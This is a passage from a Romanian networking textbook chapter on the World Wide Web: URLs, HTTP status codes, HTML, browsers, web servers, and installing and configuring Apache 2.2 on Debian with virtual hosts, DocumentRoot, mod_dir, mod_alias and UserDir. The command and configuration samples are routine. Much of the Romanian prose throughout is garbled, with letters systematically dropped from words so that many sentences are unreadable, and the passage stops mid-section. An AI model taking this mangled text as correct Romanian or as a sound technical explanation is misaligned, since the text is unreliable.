Apache HTTP Server. A scris prima versiune ca student la Universitatea din Illinois unde a
lu at u e hipa i iţială a NC“A Mosai u ul di t e p i ele o se -e web). A contribuit la
spe ifi aţia i iţială a Co o Gate a I te fa e CGI a e s-a dovedit a fi un element
cheie în realizarea unui web dinamic. În prezent este dezvoltator la Yahoo!.
Ward Cunningham este creatorul primului software de wiki numit WikiWikiWeb
(1994). Software-ul de iki a fost folosit i iţial î i te io ul o pa iei sale. A lu at la
Mi osoft Co po atio și la E lipse Fou datio ia i p eze t este CTO la o pa ia
AboutUs.
World Wide Web-ul este u spaţiu de i fo aţie î a e ele e tele de i te es, u oscute
su u ele de esu se, su t e u os ute p i utiliza ea u o ide tifi ato i glo ali, de u iţi
URI (Uniform Resource Identifiers). Termenul nu trebuie confundat cu Internetul; web-ul este
de fapt u se i iu a e a ţio ează deasup a I te etului.
9.1 Modul de funcţionare a Web-ului

‘esu sele o iș uite ale e -ului sunt denumite pagini web. Pentru accesarea unei pagini
web sau a unei alte resurse se începe prin introducerea URL-ului asociat acelei pagini în
browser, sau prin folosirea unui hyperlink ăt e pagi a espe ti ă. Î od e ide t, u pas
a te io o stă î ezol a ea u elui se e ului di U‘L î t -o adresa IP folosind DNS.
U ăto ul pas este t a s ite ea u ei e e i HTTP ăt e se e ul e a e fu ţio ează la
ad esa IP ezol ată. “e soli ită astfel pagi a e sau esu sa p eze tă î U‘L. O pagi ă e
o iş uită este, î ea ai a e pa te, u fişie te t î fo at HTML. Î u a soli ită ii,
se e ul e ide tifi ă esu sa şi o t a s ite lie tului. Clie tul este hia browser-ul.
În continuare, sarcina browser-ului este de a eda pagi a des isă de fişie ele HTML, C““ şi
alte fişie e, î o po â d i agi i, link-u i şi alte esu se după u este e esa . ‘ezultatul este
afişa ea pagi ii soli itate î e a ul browser-ului.
Majoritatea paginilor we o o ţi e hyperlink-u i ăt e alte pagi i, ăt e fişie e a e pot
fi des ă ate sau ăt e alte esu se e . O astfel de ole ţie de esu se i te o e tate p i
intermediul hyperlink-u ilo a fost de u ită u e de i fo aţie. Posi ilitatea a esă ii și
311 | W o r l d W i d e W e b
folosirii acestor resurse în Internet a produs ceea ce Sir Tim Berners-Lee a denumit, la
î eputul a ilo , Wo ld Wide We .
Sir Tim Berners-Lee a e e itul de a fi găsit soluţia de su es a e să st u tu eze a titatea
astă de i fo aţie di ad ul I te etului apă ută a u a e a e ti de ii a estuia la sfâ şitul
a ilo ' şi î eputul a ilo ' . După ulte te tati e e euşite de a o ga iza a este
i fo aţii, Be e s-Lee a găsit soluţia a e s-a impus, prin folosirea conceptului de hypertext la
un loc cu Internetul. În acest proces el a dezvoltat un sistem de identificatori globali unici
pentru resurse din Web: URI (Uniform Resource Identifiers).
9.1.1 Uniform Resource Locator (URL)

Un URL1 ep ezi tă u fo at sta da dizat de ad esa e a esu selo de pe Internet. Un
URL este de fapt un URI (Uniform Resource Identifier); altfel spuse, este un identificator al unei
resurse. Fiind mai cunoscut, termenul de URL va fi folosit în continuare. URL-ul a fost o
i o aţie fu da e tală î isto ia I te etului. “i ta a a fost p oie tată pe t u a fi ge e i ă,
e te si ilă şi apa ilă să e p i e ad esele î o i e set de a a te e utilizâ d u su set li itat
de caractere ASCII.
U U‘L o i ă î t -o ad esă si plă ele pat u ele e te de ază e esa e pe t u
localizarea unei resurse oriunde în cadrul Internetului:
 protocolul folosit î ad ul o u i aţiei,
 serverul (host) u a e se o u i ă,
 portul de pe server folosit pentru conectare,
 calea ăt e esu sa de pe se e sp e e e plu u u e de fişie .
Sintaxa folosită î ad ul U‘L-ului este protocol://server:port/cale. Da ă se do eşte
şi aute tifi a e, si ta a a e fo atul protocol://nume:parola@server:port/cale. Ultima
fo ă a si ta ei poate fi folosită, sp e e e plu, la aute tifi a ea pe site-uri FTP.
Un exemplu de URL este cel de mai jos:
http://www.samplesite.org:80/pub/search.html?search=world&num=10
În acest exemplu:
 http este protocolul;
 www.samplesite.org este serverul;
 80 este portul folosit pentru conectarea la server (de vreme ce 80 este valoarea impli ită
pe t u p oto olul HTTP, a eastă po ţiu e putea fi o isă ;
 /pub/search.html este alea ăt e esu să;
 ?search=world&num=10 este şi ul de i te oga e a eastă pa te este opţio ală .
Î a se ţa â pului p oto ol di U‘L, î t -un browser se foloseşte i plicit HTTP. De
asemenea, întrucât portul 80 este cel implicit, în mod normal nu este specificat. Drept urmare,
u utilizato a i t odu e u ai u U‘L pa ţial p e u www.samplesite.org/
pub/search.html. Totodată, pe t u a o fi a ele a ţa www ca serviciu în Internet, o
înregistrare DNS cu cheia samplesite.org a a ea, de o i ei, aso iată a eeaşi ad esă IP a
înregistrarea pentru www.samplesite.org. Î a est fel, o u ă pa te di site-urile web pot fi
a esate fă ă spe ifi a ea www î faţa u elui de do eniu.
9.1.2 Hypertext Transfer Protocol

HTTP ep ezi tă p i ipala etodă de o ţi e e a i fo aţiei î Wo ld Wide We . “ opul
i iţial a fost ea ea u ei odalităţi de pu li a e şi t a s ite e de pagi i HTML. Dez olta ea
HTTP a fost oo do ată de World Wide Web Consortium şi Internet Engineering Task Force,
culminând cu publicarea unei serii de RFC-uri, cel mai notabil RFC 2616, care descrie HTTP/1.1,
1
312 | ‘ e ţ e l e L o a l e
e siu ea HTTP utilizată î a este o e te. Ve siu ea HTTP/ . adu e ai ulte

î u ătăţi i şi a a te isti i oi, da ă â e pe fe t o pati ilă u HTTP/ . .
HTTP este un protocol de tip î tre are/răspu s î t e lie ţi şi se e e. U lie t e de
obicei un browser , sta ileşte o o e iu e TCP pe u po t al u ei staţii po tul i pli it este
portul 80). Un server HTTP as ultă pe a el po t şi aşteaptă di pa tea lie tului t a s ite ea
unei cereri de forma:
GET /cale/catre/resursa HTTP/1.0
u ată de u esaj de tip MIME o ţi â d u set de a tete pe t u des ie ea e e ii şi

u â p opţio al de date. U ele a tete su t opţio ale, pe â d altele, p e u Host sunt
o ligato ii pe t u HTTP/ . . După p i i ea e e ii, se e ul t a s ite lie tului u şi de tip
ăspu s, u a fi 200 OK, şi u esaj ep eze tâ d fişie ul e ut sau u esaj de e oa e sau
altă i fo aţie.
‘ăspu sul t i is de se e î epe u u od e i di ă tipul ăspu sului, î ad â du-se în
u ătoa ele atego ii:
 1xx: informare;
 2xx: succes;
 3xx: redirectare;
 4xx: mesaj de interogare eronat;
 5xx: eroare la nivelul serverului.
HTTP dife ă de alte p oto oale care folosesc TCP (cum este FTP) prin încheierea conexiunii
după e o a u ită e e e a fost satisfă ută. A est lu u fa e di HTTP p oto olul ideal pe t u
Wo ld Wide We , u de pagi ile au legătu i ăt e alte pagi i pe alte se e e. Lipsa u ei
conexiuni persistente impune programatorilor web folosirea unor metode alternative pentru a
eţi e sta ea o e iu ii. P i t e a estea se u ă ă ookies, a ia ile as u se î form-uri
web) sau sesiuni pe server.
O altă a a te isti ă i po ta tă a HTTP este lipsa se urității o u i ației. Acest lucru a
o dus la apa iţia HTTP“. HTTP“ este e siu ea se u izată a HTTP, utilizâ d ““L/TL“ Secure
Sockets Layer/Transport Layer Security pe t u a p oteja t afi ul. P oto olul foloseşte i pli it
po tul . ““L, i iţial eat pe t u a p oteja HTTP da folosit a u î p eu ă u alte
p oto oale , este pot i it o u i aţiilo HTTP î t u ât poate asigu a p ote ţie hia da ă
u ai u ul di e ii o u i aţiei se e ul este aute tifi at. A easta este situaţia
o iş uită î azul t a za ţiilo HTTP pe I te et.
9.1.3 HyperText Markup Language

HTML face parte din categoria limbajelor descriptive (markup languages şi este folosit
pe t u ea ea de pagi i e şi alte i fo aţii a e să poată fi edate î t -un browser web.
HTML este folosit pe t u a st u tu a i fo aţia, des ii d a u ite po ţiu i de te t a a tete,
pa ag afe, liste, et ., şi poate fi folosit pe t u a defi i se a ti a u ui do u e t.
I iţial defi it de “i Ti Be e s Lee şi apoi dez oltat de IETF u o si ta ă “GML
simplifi ată, HTML este astăzi u sta da d i te aţio al. “pe ifi aţia HTML este e ţi ută de
World Wide Web Consortium (W3C).
Primele versiuni de HTML erau definite cu reguli sintactice destul de permisive, aspect
a e a ajutat la adopta ea sa ăt e ei a e nu aveau familiaritate cu publicarea web. Browser-
ele ealizau di e se p esupu e i desp e i te ţia a esto a şi o ti uau u eda ea pagi ii
respective. De-a lu gul ti pului, î ad ul sta da delo ofi iale, a apă ut i te ţia de a ea o
si ta ă de li aj di e î e ai st i tă. Cu toate a estea, browser-ele o ti uă să edea
pagini care sunt departe de un format HTML valid.
Ve siu ea u e tă a spe ifi aţiei HTML este HTML . . W C a i te ţio at î lo ui ea

a estuia u XHTML, a e apli ă egulile st i te ale XML în HTML. Adoptarea XHTML se
ealizează î t -u it ai puţi apid, d ept pe t u a e W C dez oltă e siu ea a HTML.
Tipurile de marcaje existente în HTML sunt:
 marcaj structural - descrie scopul textului; spre exemplu <h2>Section</h2> di e ţio ează
browser-ul să edea Section ca un antet de nivel doi;
 marcaj de prezentare - descrie modul în care apare textul; de exemplu, <b>boldface</b> va
reda boldface î te t î g oşat;
 marcaj hypertext - leagă pă ţi ale do u e tului ăt e alte do u e te; sp e exemplu, <a
href=”http://en.wikipedia.org”>Wiki</a>, a eda şi ul Wiki a u h pe li k ăt e
URL-ul specificat.
9.1.4 Clienţi web

Ca ajo itatea se i iilo di I te et, o u i aţia p i HTTP se ealizează folosi d
paradigma client-se e . Clie ţii e su t u os uţi su u ele de navigatoare web
(browser-e). Browser-ul este o apli aţie a e pe ite utilizato ului afişa ea şi i te a ţiu ea u
do u e te HTML găzduite pe a u ite se e e e sau e ţi ute î ad ul u ui siste de
fişie e. P i t e ele ai u oscute browser-e se u ă ă Microsoft Internet Explorer, Mozilla
Firefox, Opera şi Safari. Un browser este cel mai cunoscut tip de user agent.
Browser-ele e o u i ă u se e ele e folosi d HTTP pe t u o ţi e ea de pagi i
web. HTTP permite browser-elor să soli ite i fo aţii se e elo e şi să o ţi ă pagi i e
de la acestea. Paginile sunt localizate prin intermediul URL-ului. Formatul unei pagini web este
de obicei cod HTML care este identificat în protocolul HTTP prin folosirea unui MIME content
type.
Browser-ele su t e u ite dato ită „ ăz oiului a igatoa elo browser wars), o petiţie
legată de do i a ea pieţei browser-elo . Te e ul este folosit pe t u două pe ioade de ti p:
lupta dintre Internet Explorer şi Netscape Navigator, la sfâ şitul a ilo ' , şi eşte ea
popula ităţii Mozilla Firefox, în detrimentul Internet Explorer, începând cu anul 2004. Aceste
ăz oaie se ăsf â g şi asup a utilizato ilo , a e p efe ă a u ite browser-e î faţa alto a. Î
o e tul s ie ii a estei ă ţi, Internet Explorer do i ă piaţa browser-elor cu o pondere de
50%, urmat de Mozilla Firefox cu 45%.
“iste ele U i p ezi tă şi browser-e î li ie de o a dă utile î azul testă ii apide a u ui
site sau î a se ţa i te feţei g afi e. P i t e a estea se u ă ă lynx, links, elinks, w3m.
9.1.5 Servere web

Un server web (server HTTP) este un serviciu/daemon care are rolul de a furniza
do u e te lie ţilo e . Clie tul e se a o e ta la se e şi îi a soli ita a estuia o
esu să e esa ă.
Deşi apli aţiile a e i ple e tează u se e e dife ă î detaliu, o ţi a eleaşi
a a te isti i de ază. Fie a e se e e a eptă o e e e HTTP di eţea sau di I te et şi
fu izează u ăspu s HTTP ăt e soli ita t. Î ge e al, ăspu sul o ţi e te t HTML, da
poate fi u fişie text, o imagine, sau alt tip de document.
Cele mai cunoscute servere web sunt:
 Apache HTTP Server, de la Apache Software Foundation
 Internet Information Services (IIS), de la Microsoft
 Google Web Server de la Google
 Sun Java Web Server, de la Sun Microsystems
 Zeus Web Server, de la Zeus Technology
314 | ‘ e ţ e l e L o a l e
9.1.5.1 Fu țio area u ui ser er e

“e e ele e t a slatează o po e ta cale (path) din cadrul unui URL într-o esu să di
siste ul lo al de fişie e. Calea spe ifi ată î U‘L de ăt e lie t este elati ă la directorul
rădă i ă al serverului web (webroot).
“p e e e plu, se p esupu e situaţia î a e u utilizato foloseşte U‘L-ul
http://www.samplesite.org/pub/file.html. După i t odu e ea a estui U‘L î a a de
adrese a browser-ului, a esta îl t a slatează î t -o conexiu e ăt e www.samplesite.org cu
u ătoa ea e e e HTTP . :
GET /pub/file.html HTTP/1.1
Host: www.samplesite.org
“e e ul e a e ulează pe www.samplesite.org a o ate a alea soli itată la

di e to ul său ădă i ă webroot). Pe un sistem Debian/Ubuntu a e ulează u se e Apa he,
di e to ul ădă i ă i pli it este /var/www. Astfel, esu sa soli itată de lie t a fi i t a ea di
siste ul lo al de fişie e /var/www/pub/file.html. Î o ti ua e, se e ul e a iti fişie ul
şi îl a t a s ite lie tului. ‘ăspu sul a o ţi e di e se a tete e esa e şi fişie ul efe ti .
I agi ea u ătoa e este o ep eze ta e g afi ă a odului de fu ţio a e a u ui se e
web:
MUA
utilizator
U
RL GET /pub/file.html HTTP/1.1
Host: www.samplesite.org
HTTP 200 OK + /webroot/pub/file.htm

resursa l
sistem de
server Web fişie e
9-1: Fu țio area ser i iului e
9.2 Apache HTTP Server

Apache HTTP Server este actualmente cel mai utilizat server de web. Conform sondajelor
ealizate de ăt e NetC aft, î iu ie , . % di se e ele e ulau Apa he 1. Dincolo de
faptul ă este p i ipalul se e e , u o do i aţie şi ai a e tuată pe siste e Li u /UNIX,
oti e supli e ta e pe t u studie ea Apa he su t şi pe fo a ţa idi ată a a estuia, u ă ul
a e de opţiu i de o figu a e, posi ilitatea adăugă ii de oi a a te isti i ajo itatea su
fo ă de odule o pilate , o se ie de utilita e aso iate şi i teg a ea fa ilă u alte apli aţii.
Ve siu ea Apa he . a fost o es ie e su sta ţială a odului e siu ii Apa he . ,
adăugâ d ulte î u ătăţi i. A estea i lud folosi ea thread-u ilo UNIX, supo t î u ătăţit
1
http://news.netcraft.com/archives/web_server_survey.html
pentru platforme non-UNIX (precum Windows), un nou API, suport IPv6, introducerea unui
nivel de portabilitate, Apache Portable Runtime1. Ve siu ea sta ilă u e tă a se e ului este
2.2.9.
“etul de i te feţe de p og a a e API pe a e Apa he îl pu e la dispoziţie este cel care
asigu ă e te si ilitatea a estuia p i i te ediul odulelo . Pa hetul p i ipal o ţi e
se e ul HTTP, u â d a soli ită ile supli e ta e să fie satisfă ute p i adăuga ea de oi
module, precum mod_ssl, mod_perl, mod_php, mod_auth, etc.
Ve siu ea de Apa he folosită pe pa u sul a estui apitol este . , dispo i ilă î e siu ea
sta ilă De ia Et h, î De ia Le şi ulti ele e siu i de U u tu.
9.2.1 Instalare
I stala ea e siu ii Apa he . se ealizează î od o iş uit folosi d apt-get:
ragnarok:~# apt-get install apache2
apache2-mpm-worker apache2-utils apache2.2-common
apache2 apache2-mpm-worker apache2-utils apache2.2-common
[...]
Module authz_groupfile installed; run /etc/init.d/apache2 force-reload to enable.
Module authn_file installed; run /etc/init.d/apache2 force-reload to enable.
Module authz_host installed; run /etc/init.d/apache2 force-reload to enable.
Setting up apache2-mpm-worker (2.2.3-4+etch1) ...
Starting web server (apache2)....
Setting up apache2 (2.2.3-4+etch1) ...
E eptâ d o po e tele de ază, se i stalează şi o se ie de odule şi se po eşte

se e ul. După u se o se ă, se i stalează pa hete. A estea su t:
 apache2: o ţi e i te faţa o t ol a se e ului e ;
 apache2-mpm-worker: o ţi e i ple e ta ea de tip threading worker a serverului;
 apache2-util: o ţi e o se ie de utilita e folositoa e u ui se e e logresolve,
htpasswd, rotatelogs, etc.);
 apache2.2-common: o ţi e modulele Apache2 standard, incluzând suportul SSL.
9.2.2 )nteracţiunea cu serverul web

E istă ai ulte posi ilităţi de a i te a ţio a u se e ul:
 comanda apache2 este p i ipala i te faţă de lu u u se e ul Apa he; a easta pe ite
po i ea, op i ea şi epo i ea se e ului u posi ilitatea p e iză ii u o opţiu i de o figu a e
di a i ă şi a u o i fo aţii desp e se e lista de odule o pilate, lista de di e ti e :
ragnarok:~# /usr/sbin/apache2
Usage: /usr/sbin/apache2 [-D name] [-d directory] [-f file]
[-C "directive"] [-c "directive"]
[-k start|restart|graceful|graceful-stop|stop]
[-v] [-V] [-h] [-l] [-L] [-t] [-S]
[...]
ragnarok:~# apache2 -l
Compiled in modules:
core.c
mod_log_config.c
mod_logio.c
worker.c
http_core.c
mod_so.c
ragnarok:~# apache2 -k stop
ragnarok:~# apache2 -k start
ragnarok:~# apache2 -k restart
1
http://apr.apache.org/
316 | ‘ e ţ e l e L o a l e
 comanda apache2ctl este o i te faţă de o t ol a se e ului Apa he; este o a da

p efe ată pe t u po i ea şi epo i ea se e ului, pe iţâ d şi e ifi a ea o e titudi ii
fişie ului de o figu a e:
ragnarok:/home/razvan# apache2ctl stop
ragnarok:/home/razvan# apache2ctl start
ragnarok:/home/razvan# apache2ctl restart
ragnarok:/home/razvan# apache2ctl configtest
Syntax OK
 /etc/init.d/apache2 este u s ipt a e i te faţează i te a ţiu ea u se e ul; poate fi

folosit pe t u po i ea, epo i ea, op i ea se e ului, şi pe t u e iti ea fişie ului de
configurare:
ragnarok:/home/razvan# /etc/init.d/apache2
Usage: /etc/init.d/apache2 {start|stop|restart|reload|force-reload}
ragnarok:/home/razvan# /etc/init.d/apache2 stop
Stopping web server (apache2)....
ragnarok:/home/razvan# /etc/init.d/apache2 start
Starting web server (apache2)....
ragnarok:/home/razvan# /etc/init.d/apache2 restart
Forcing reload of web server (apache2)... waiting .
ragnarok:/home/razvan#
Fişie ele de ju aliza e pe t u se e su t /var/log/apache/error.log şi

/var/log/apache/access.log.
Fişie ele de o figu a e se găses î di e to ul /etc/apache2/. “t u tu a a esto fișie e a
fi p eze tată î o ti ua e.
9.2.3 Configurare globală

După u s-a p e izat, o figu a ea se e ului Apa he se ealizează p i i te ediul
fişie elo di /etc/apache2/. A est di e to o ţi e ai ulte i t ă i după u se poate
edea î lista ea de ai jos. Da ă la e siu ea Apa he . e ista u si gu fişie de o figu a e,
e oia de odula itate a o dus la apa iţia ai ulto i t ă i u olu i i e sta ilite. Fişie ele
de o figu a e o ţi di e ti e si ple1, precum:
User www-data
sau di e ti e o puse, de u ite şi se ţiu i de o figu a e2, precum:

<Files ~ "^\.ht">
Order allow,deny
Deny from all
</Files>
‘olul fie ă ei i t ă i di di e to ul /etc/apache2/ este:

 apache2.conf o ţi e o figu ă ile glo ale pe t u serverul Apache2; directivele din acest
fişie se efe ă la fu ţio a ea se e ului u ă ul de p o ese des hise, i te ale de ti eout
et . şi la i lude ea de odule a e o afe ta toate do e iile ad i ist ate de se e virtual
hosts); apache2.conf, fiind fişie ul p i ipal de o figu a e, i lude toate elelalte fişie e:
[…]
# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf
# Include all the user configurations:
Include /etc/apache2/httpd.conf
# Include ports listing
Include /etc/apache2/ports.conf
# Include generic snippets of statements
Include /etc/apache2/conf.d/
[…]
1
http://httpd.apache.org/docs/2.2/mod/quickreference.html
2
http://httpd.apache.org/docs/2.2/sections.html
 httpd.conf o ţi e dife ite o figu ă i pe t u utilizato i;

 ports.conf defi eşte po tul/po tu ile pe a e se e ul as ultă o e iu i;
 envvars defi eşte a ia ilele de ediu folosite de apachectl;
 conf.d/ o ţi e fişie e de o figu a e pe t u di e se se i ii a e foloses Apa he ; e e ple
sunt servicii de webmail, navigare în repositories, wiki etc.;
 mods-available/ defi eşte odulele Apa he i stalate î siste ; fişie ele de ai i au e te sia
.load, i di â d odulul a e t e uie î ă at; e istă şi fişie e .conf care definesc directive
suplimentare de configurare pentru modul;
 mods-enabled/ defi eşte odulele a ti e pe du ata ulă ii se e ului; fişie ele de ai i su t
legătu i si oli e ăt e fişie ele di mods-available/;
 a ti a ea u ui odul se fa e, aşada , p i ea ea u ei legătu i si oli e sp e fişie ul aso iat
din mods-available/ şi epo i ea se e ului; se poate folosi utilitarul a2enmod;
 sites-available/ defi eşte do e iile pe t u a e se e ul poate fi o figu at să ăspu dă
la cereri; este folosit pentru virtual hosting; î p i ă fază se e ul defi eşte u si gu do e iu
el i pli it î ad ul fişie ului u u ele default;
 sites-enabled/ defi eşte do e iile virtual hosts pe t u a e se e ul ăspu de la e e i;
a şi î azul odulelo , fişie ul aso iat u ui do e iu este o legătu ă si oli ă sp e fişie ul di
sites-available/; adăuga ea u ui ou do e iu se fa e p i ea ea i sta ţei aso iate î
sites-available/; a ti a ea a elui do e iu se fa e p i ea ea u ei legătu i si oli e î
sites-enabled/ şi epo i ea serverului; se e o a dă folosi ea utilita ului a2ensite.
ATENŢIE: Fişie ele spe ifi ate su t spe ifi e dist i uţiilo De ia /U u tu. Deşi alte
dist i uţii au, de ase e ea, o st u tu ă a fişie elo de o figu a e, lo aţia şi de u i ea
acestora pot diferi.
9.2.3.1 Configurarea domeniului implicit

După u s-a precizat, domeniile gestionate de Apache sunt servite prin intermediul
virtual hosts. Î p i ă fază Apa he gestio ează u do e iu i pli it defi it î fişie ul
/etc/apache/sites-available/default. A ti a ea a estui do e iu este i pli ită p i
e iste ţa legătu ii si oli e /etc/apache/sites-enabled/000-default.
Co ţi utul i pli it al fişie ului /etc/apache/sites-available/default este
prezentat în continuare:
ragnarok:~# cat /etc/apache2/sites-enabled/000-default
NameVirtualHost *
<VirtualHost *>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
# This directive allows us to have apache2's default start page
# in /apache2-default/, but still have / go to the right place
RedirectMatch ^/$ /apache2-default/
</Directory>
[...]
ErrorLog /var/log/apache2/error.log
[...]
</VirtualHost>
Nu se va insista asupra directivelor legate de virtual hosting întrucât vor fi prezentate în

se ţiu ea TODO.
O di e ti ă i po ta tă este DocumentRoot. A easta p e izează di e to ul ădă i ă
(webroot de u de o fi e upe ate esu sele e ute de lie ţi. Di e to ul ădă i ă pe t u
318 | ‘ e ţ e l e L o a l e
domeniul implicit este /var/www. A est lu u î sea ă ă o e e e de fo a GET

/cale/catre/resursa HTTP/1.0 va impune serverului transmiterea fişierului
/var/www/cale/catre/resursa către client.
Directiva Directory spe ifi ă p op ietăţi pe t u u a u it di e to . Pe t u di e to ul
/var/www, di e ti a spe ifi ă p op ietăţile de ai jos:
Directiva Options i pu e folosi ea fişie elo i de di di e to ezi 9.2.3.2 , u ă i ea

legătu ilo si oli e e iste te î di e to şi adăuga ea u ei e te sii la ale.
AllowOverride None
Directiva AllowOverride este folosită î ta de u fişie ul .htaccess a e o figu ează

drepturi de acces în Apache [vezi 9.2.3.5 . A easta p e izează a e di e ti e defi ite î fişie ul
.htaccess pot suprascrie alte di e ti e. Î azul de faţă, folosi ea None fa e i utilă p eze ţa
u ui fişie .htaccess.
Order allow,deny
allow from all
Directivele allow şi deny sunt folosite pentru a permite sau refuza accesul la director.
Directiva Order i di ă o di ea î a e a estea o fi e aluate. Da ă a e ista o di e ti ă deny
from all, atu i o i e a es a fi efuzat pe t u ă di e ti a deny este a alizată ulti a.
Directiva RedirectMatch ealizează edi e ta ea pe t u o ale ăt e esu să dată. Î azul

de faţă se ealizează edi e ta ea pe t u esu sa /. A est lu u î sea ă a o e e e de fo a
GET / HTTP/1.0 a fi e hi ale tă u e e ea GET /apache2-default/ HTTP/1.0.
După u se o se ă, ăile ăt e esu se di e e ile HTTP pot fi date su fo ă de
di e toa e. Î a eastă situaţie se e ul e a e două a ia te de ăspu s:
 t a s ite ea o ţi utului di e to ului;
 t a s ite ea u ei esu se i pli ite, î azul î a e a easta se află î di e to .
A doua a ia tă a e p io itate î faţa p i ei. ‘esu sa i pli ită este, de o i ei, u fişie u
numele index.html sau altul precizat prin directiva DirectoryIndex din modulul mod_dir.
Mai ulte detalii su t p e izate î se ţiu ea 9.2.3.2.
Un lucru de reţi ut este faptul ă di e ti ele p eze te î ad ul di e ti ei o puse
<VirtualHost> ... </VirtualHost> pot sup as ie di e ti ele di fişie ul glo al de
configurare /etc/apache/apache2.conf. Î azul de faţă, s-a spe ifi at fişie ul de ju aliza e
a erorilor pentru domeniul gestionat implicit:
ErrorLog /var/log/apache2/error.log
9.2.3.2 Configurare module

Fa ilităţile de ază ale se e ului Apa he pot fi e ti se p i i te ediul odulelo .
Modulele de ază su t i stalate p i i te ediul pa hetului apache2-common. Fiecare modul
este de fapt o i liote ă pa tajată; fişie ul aso iat a e e te sia .so. Pe t u adăuga ea u ui
odul se foloseşte di e ti a LoadModule.
U odul a e aso iat u fişie .load î a e se foloseşte di e ti a LoadModule. A est fişie
se găseşte în directorul /etc/apache2/mods-available/. De e e plu, fişie ul aso iat
modulului SSL este /etc/apache2/mods-available/ssl.load:
ragnarok:~# cat /etc/apache2/mods-available/ssl.load
LoadModule ssl_module /usr/lib/apache2/modules/mod_ssl.so
Biblioteca partajată aso iată este /usr/lib/apache2/modules/mod_ssl.so. De obicei,

numele biblioteci este mod_nume.so, unde nume este numele modulului.
U ele odule, p e u ““L, au aso iate u fişie de o figu a e u e te sia .conf. Un
astfel de fişie de o figu a e o ţi e di e ti e spe ifi e odulului espe ti :
ragnarok:~# cat /etc/apache2/mods-available/ssl.conf
<IfModule mod_ssl.c>
[...]
SSLRandomSeed startup builtin
SSLRandomSeed startup file:/dev/urandom 512
SSLRandomSeed connect builtin
SSLRandomSeed connect file:/dev/urandom 512
[...]
</IfModule>
Pe t u a u odul să fie utilizat de se e ul e se eează o legătu ă si oli ă î

/etc/apache2/mods-enabled/ ăt e fişie ul .load şi, e e tual, .conf din directorul mods-
available/. “e e o a dă folosi ea utilita ului a2enmod:
ragnarok:~# a2enmod ssl
Module ssl installed; run /etc/init.d/apache2 force-reload to enable.
Co figu a ea u ui odul, ealizată fie î fişie e .conf spe ializate sau fişie e glo ale,
foloseşte di e ti e î ad ate de di e ti a IfModule. Directiva IfModule testează da ă odulul
espe ti este î ă at î se e . Astfel, pe t u a o figu a mod_ssl se foloseşte o o st u ţie
de forma:
<IfModule mod_userdir.c>
...
</IfModule>
iar pentru a configura mod_alias se foloseşte o o st u ţie de fo a:

<IfModule mod_alias.c>
...
</IfModule>
Î o ti ua e su t p eze tate âte a aspe te ale o figu ă ii u o odule i po ta te

Apache: mod_dir, mod_alias, mod_userdir, mod_cgi.
9.2.3.2.1 Co figurare fişiere i dex

Fişie ele i de su t fişie ele a e su t afişate î azul î care calea dintr-o cerere HTTP
este u di e to . Astfel, da ă u utilizato foloseşte U‘L-ul http://www.example.com/pub/,
se transmite cererea GET /pub/ HTTP/1.0 sau GET /pub/ HTTP/1.1 ăt e se e . “e e ul
a t e ui să ofe e esu sa /var/www/pub/ care este un director. În acest moment, serverul
aută î di e to u fişie i de şi îl t a s ite lie tului.
Co figu a ea fişie elo i de se ealizează p i i te ediul odulului mod_dir. Modulul
este activat implicit:
ragnarok:~# ls /etc/apache2/mods-enabled/dir*
/etc/apache2/mods-enabled/dir.conf /etc/apache2/mods-enabled/dir.load
Fişie ul /etc/apache2/mods-available/dir.conf ăt e a e pu tează legătu a

si oli ă /etc/apache2/mods-enabled/dir.conf pe ite o figu a ea fişie elo i de :
ragnarok:~# cat /etc/apache2/mods-available/dir.conf
<IfModule mod_dir.c>
DirectoryIndex index.html index.cgi index.pl index.php index.xhtml
</IfModule>
Co figu a ea e iste tă i pu e se e ului ăuta ea pe â d a fişie elo index.html,

index.cgi, index.pl, index.php, index.xhtml î azul î a e alea ăt e esu să este u
director. Da ă se do eşte adăuga ea a fişie i de u fişie cu numele index.txt va trebui
alte ată o figu aţia e iste tă:
320 | ‘ e ţ e l e L o a l e
ragnarok:~# cat /etc/apache2/mods-available/dir.conf

<IfModule mod_dir.c>
DirectoryIndex index.html index.cgi index.pl index.php index.xhtml
</IfModule>
9.2.3.2.2 Configurare aliasuri

De ulte o i este difi il, i o od, sau hia i posi il să se sto heze u ele esu se se ite
de se e ul e î ie a hia dată de /var/www. Se poate dori, spre exemplu, ca accesul la
do u e taţia e iste tă î /usr/share/doc să se fa ă p i i te ediul u ui U‘L de fo a
http://localhost/doc/. “oluţia la a eastă p o le ă este folosi ea aliasu i.
U alias aso iază o u e de esu să e poate fi pa te a u ui U‘L u o esu să di siste ul
de fişie e. “p e e e plu, da ă se do eşte a folosi ea U‘L-ului http://localhost/doc/ să
o du ă la afişa ea esu selo di /usr/share/doc, se a utiliza o di e ti ă de fo a:
Alias /doc/ /usr/share/doc
Folosirea de aliasu i este o diţio ată de e iste ţa odulului mod_alias. Acest modul
este î ă at i pli it la po i ea se e ului Apa he :
ragnarok:~# ls /etc/apache2/mods-enabled/alias.*
/etc/apache2/mods-enabled/alias.load
Co figu a ea de aliasu i se fa e î fişie ul global de configurare

/etc/apache2/apache2.conf. Directivele de configurare sunt încadrate de directiva
<IfModule>. De o i ei o figu ă ile se ealizează la i el de do e iu i tual deoa e e
directorul webroot dife ă. Co figu aţia de alias pe t u do e iul i pli it este p eze tată î
continuare:
NameVirtualHost *
<VirtualHost *>
[...]
Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>
</VirtualHost>
“e o se ă ea ea aliasului /doc/ aşa u s-a p e izat ai sus. O di e ti ă Alias are

aso iată o di e ti ă Directory î a e se p e izează p op ietăţile di e to ului peste a e s-a
realizat aliasul.
9.2.3.2.3 Configurare UserDir

De o i ei, u utilizato al siste ului de ope a e do eşte pu li a ea u o pagi i e fă ă a
fi nevoie de a contacta administratorul sistemului. Utilizato ul eează u di e to lo al a e a
fi automat folosit de serverul web.
I ple e ta ea u ei astfel de fa ilitaţi se ealizează î Apa he p i i te ediul odulului
UserDir: mod_userdir. Acest modul nu este activat implicit în cadrul Apache2 şi t e uie a ti at
manual:
ragnarok:~# cd /etc/apache2/mods-enabled/
